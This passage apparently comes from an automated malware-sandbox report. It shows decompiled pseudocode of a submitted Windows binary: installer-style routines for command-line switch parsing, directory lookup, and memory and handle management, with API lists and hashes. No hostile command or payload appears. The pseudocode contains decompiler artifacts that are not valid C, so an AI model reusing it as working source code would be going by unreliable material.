                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: 04e4832a8e232ed6d0bbc5f82ddca92ae4a22c43c8770e2a95e789a49653ab5f
                                                                        • Instruction ID: 90ba5180af8833dfdc08a3bd6369330b56b55a4a0bdc9a7d2ab860f2fe3410d5
                                                                        • Opcode Fuzzy Hash: 04e4832a8e232ed6d0bbc5f82ddca92ae4a22c43c8770e2a95e789a49653ab5f
                                                                        • Instruction Fuzzy Hash: 3BF028331042509BD733491DB884B66BFDF9B97350F2A016FF8FA8330ACA658C8586A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E003D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E003D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E003D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}











                                                                        0x003d6229
                                                                        0x003d6230
                                                                        0x003d6247
                                                                        0x003d626a
                                                                        0x003d6272
                                                                        0x003d6249
                                                                        0x003d6255
                                                                        0x003d625f
                                                                        0x003d6264
                                                                        0x003d6264
                                                                        0x003d6284

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003D623F
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: 3ec6c85390a745a0bbedef81e918d710d9cadbf8a598d3168d41ab345cb202bd
                                                                        • Instruction ID: 0fd755e52d7d369c437c95073b4ef6706002753a74c7f842b0a3ba68284d60ef
                                                                        • Opcode Fuzzy Hash: 3ec6c85390a745a0bbedef81e918d710d9cadbf8a598d3168d41ab345cb202bd
                                                                        • Instruction Fuzzy Hash: 84F0BEB2604208ABE752EB74ED03FBE33BCDB44300F40046BA996DA282EE7499848650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0x3d8d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0x3d8d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0x3d8d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d6c)) = 0;
                                                                        				return 0;
                                                                        			}





                                                                        0x003d4b66
                                                                        0x003d4b74
                                                                        0x003d4b98
                                                                        0x003d4ba0
                                                                        0x00000000
                                                                        0x003d4bac
                                                                        0x003d4ba4
                                                                        0x00000000
                                                                        0x003d4ba4
                                                                        0x003d4b78
                                                                        0x003d4b7e
                                                                        0x003d4b84
                                                                        0x003d4b8a
                                                                        0x00000000

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,003D4FA1,00000000), ref: 003D4B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 4c14e83be25305aa0c8b33ffb0ff03ddc6876ba3442d7c458bd102297cccb83a
                                                                        • Instruction ID: 60bb84a32a40591b4c3112fb7b9ed42d9d4ec6607a5f884e8d712a60d2f21561
                                                                        • Opcode Fuzzy Hash: 4c14e83be25305aa0c8b33ffb0ff03ddc6876ba3442d7c458bd102297cccb83a
                                                                        • Instruction Fuzzy Hash: 34F0F471500B0C9F47639F39BC12652BFEABAA5360310092BA4AED25D0DB70B442CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D66AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}




                                                                        0x003d66b1
                                                                        0x003d66ba
                                                                        0x003d66c7
                                                                        0x003d66bc
                                                                        0x003d66be
                                                                        0x003d66be

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,003D4777,?,003D4E38,?), ref: 003D66B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 306d80e325fc231b87cd260c498dd763bb6facc83144a13d77394891b6bb9dc2
                                                                        • Instruction ID: 49f0daff61a9995337389d76f00ad4776447af2f7ee656d0006b76562ae27f4c
                                                                        • Opcode Fuzzy Hash: 306d80e325fc231b87cd260c498dd763bb6facc83144a13d77394891b6bb9dc2
                                                                        • Instruction Fuzzy Hash: 3DB09277222840426A2206357C2A5562945A6C133ABE55B96F032C02E0CA3EC846D004
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x003d4caa
                                                                        0x003d4cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 003D4CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: 6115b82822c6f913ceed47e977ac936fdf5c677cc8ed9ae28ab2781ea9e01152
                                                                        • Instruction ID: 5e4d370b5ca5f92440d62b6049519aaad177e33c16f9a04b13d703bbb6b76bd8
                                                                        • Opcode Fuzzy Hash: 6115b82822c6f913ceed47e977ac936fdf5c677cc8ed9ae28ab2781ea9e01152
                                                                        • Instruction Fuzzy Hash: DFB0123204420CB7CF012FD2FC09F853F1DEBC4761F144001F60C45050CA7294108696
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x003d4cc8
                                                                        0x003d4ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: b0e71f397b961cea7ae9939d8d1496909a183a6cb5c95c9545e5339080feeb36
                                                                        • Instruction ID: 9999325ce882df45bdc908bde2e55085ffe00a262c70e22a97c799cff34cdf38
                                                                        • Opcode Fuzzy Hash: b0e71f397b961cea7ae9939d8d1496909a183a6cb5c95c9545e5339080feeb36
                                                                        • Instruction Fuzzy Hash: A8B0123100010CB78F012B52FD088453F1DD6C4360B000011F50C41021CB3398118585
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E003D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E003D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E003D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0x3d8004; // 0xf4fc83b5
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E003D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E003D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0x3d9124 = E003D6285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E003D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E003D44B9(0, 0x521, 0x3d1140, 0, 0x40, 0);
                                                                        												_t85 =  *0x3d8588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E003D667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E003D667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E003D5C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E003D1680(0x3d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E003D667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E003D667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0x3d8a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E003D5C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0x3d8b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0x3d8a3a;
                                                                        																}
                                                                        																E003D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E003D658A(_t218, 0x104, 0x3d1140);
                                                                        																if(E003D31E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0x3d8a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0x3d8a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0x3d8a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0x3d8a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0x3d8a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0x3d9a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0x3d9a2c =  *0x3d9a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0x3d8d48 =  *0x3d8d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0x3d9a2c =  *0x3d9a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0x3d9a2c =  *0x3d9a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0x3d8d48 =  *0x3d8d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0x3d9a2c =  *0x3d9a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0x3d8a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0x3d9a2c = 3;
                                                                        																	 *0x3d8a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0x3d8a2c != 0 &&  *0x3d8b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0x3d9a3c, 0x3d8b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E003D66C8(0x3d8b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}


































































                                                                        0x003d5c9e
                                                                        0x003d5ca9
                                                                        0x003d5cb0
                                                                        0x003d5cb3
                                                                        0x003d5cb6
                                                                        0x003d5cb7
                                                                        0x003d5cb8
                                                                        0x003d5cbd
                                                                        0x003d6204
                                                                        0x003d5ccb
                                                                        0x00000000
                                                                        0x003d5ccb
                                                                        0x003d5cd3
                                                                        0x003d5cd7
                                                                        0x003d5cf4
                                                                        0x00000000
                                                                        0x003d5cf4
                                                                        0x003d5cf8
                                                                        0x003d5d00
                                                                        0x00000000
                                                                        0x003d5d06
                                                                        0x003d5d06
                                                                        0x003d5d0e
                                                                        0x003d5d10
                                                                        0x003d5d12
                                                                        0x003d5d14
                                                                        0x003d5d15
                                                                        0x003d5d17
                                                                        0x003d5d49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5d19
                                                                        0x003d5d19
                                                                        0x003d5d1d
                                                                        0x00000000
                                                                        0x003d5d3f
                                                                        0x003d5d3f
                                                                        0x003d5d4b
                                                                        0x003d5d4b
                                                                        0x003d5d4f
                                                                        0x003d5d8d
                                                                        0x00000000
                                                                        0x003d5d93
                                                                        0x003d5d93
                                                                        0x003d5d9a
                                                                        0x003d5d9d
                                                                        0x003d5d9e
                                                                        0x00000000
                                                                        0x003d5d9e
                                                                        0x003d5d51
                                                                        0x003d5d5b
                                                                        0x003d5d72
                                                                        0x003d60fb
                                                                        0x003d60fb
                                                                        0x003d6207
                                                                        0x003d620a
                                                                        0x003d620b
                                                                        0x003d620e
                                                                        0x003d6217
                                                                        0x003d5d78
                                                                        0x003d5d78
                                                                        0x003d5d80
                                                                        0x003d5d83
                                                                        0x003d5d84
                                                                        0x00000000
                                                                        0x003d5d84
                                                                        0x003d5d5d
                                                                        0x003d5d5f
                                                                        0x003d5d62
                                                                        0x003d5d68
                                                                        0x003d5d64
                                                                        0x003d5d64
                                                                        0x003d5d64
                                                                        0x00000000
                                                                        0x003d5d62
                                                                        0x003d5d5b
                                                                        0x003d5d4f
                                                                        0x003d5d1d
                                                                        0x00000000
                                                                        0x003d5d9f
                                                                        0x003d5d9f
                                                                        0x003d5da5
                                                                        0x003d5dab
                                                                        0x003d5dba
                                                                        0x003d6218
                                                                        0x003d621d
                                                                        0x003d6220
                                                                        0x003d6221
                                                                        0x003d6229
                                                                        0x003d6230
                                                                        0x003d6247
                                                                        0x003d626a
                                                                        0x003d6272
                                                                        0x003d6249
                                                                        0x003d6255
                                                                        0x003d625f
                                                                        0x003d6264
                                                                        0x003d6264
                                                                        0x003d6284
                                                                        0x003d5dc0
                                                                        0x003d5dc0
                                                                        0x003d5dca
                                                                        0x003d5e22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5dcc
                                                                        0x003d5dce
                                                                        0x003d5e24
                                                                        0x003d5e24
                                                                        0x003d5e2c
                                                                        0x003d5e47
